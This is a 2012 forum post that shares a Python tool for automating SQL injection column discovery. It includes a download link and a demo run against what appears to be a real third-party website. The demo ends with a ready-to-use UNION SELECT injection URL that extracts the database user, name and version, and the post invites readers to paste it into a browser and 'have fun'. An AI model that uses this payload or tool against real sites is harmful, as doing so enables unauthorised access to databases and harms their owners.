aelius Posted October 4, 2012 Report Posted October 4, 2012 (edited) [*] DescriptionThe Full Automated Column Finder helps you to determine the correct amount of columns of the current SQL query. It is useful for SQL injection and safes you some time fuzzing manually.After the correct amount of columns was found, a sample URL for exploiting the SQL injection vulnerability can be displayed.[*] Downloadhttp://xenuser.org/tools/column_finder.py[*] Author webpageAscii for Breakfast[*] SourceFull Automated Column Finder for SQL Injection[*] Demohp work # python column_finder.py -u "http://www.mida.ro/content.php?id=21">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Full Automated Column Finder for SQL Injectionby Valentin Hoebel (valentin@xenuser.org)Version: 1.1 (23th May 2010)<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>> Checking if connection can be established...>> Connected to target! URL seems to be valid.>> Trying to find the correct number of columns...>> Correct number of columns found!>> Amount: 4>> Do you want to have a sample URL for exploiting? (Yes/No) Yeshttp://www.mida.ro/content.php?id=21+AND+1=2+UNION+SELECT+concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version())--Simply copy and paste this link into your browser Have fun! Bye Edited October 4, 2012 by aelius Quote
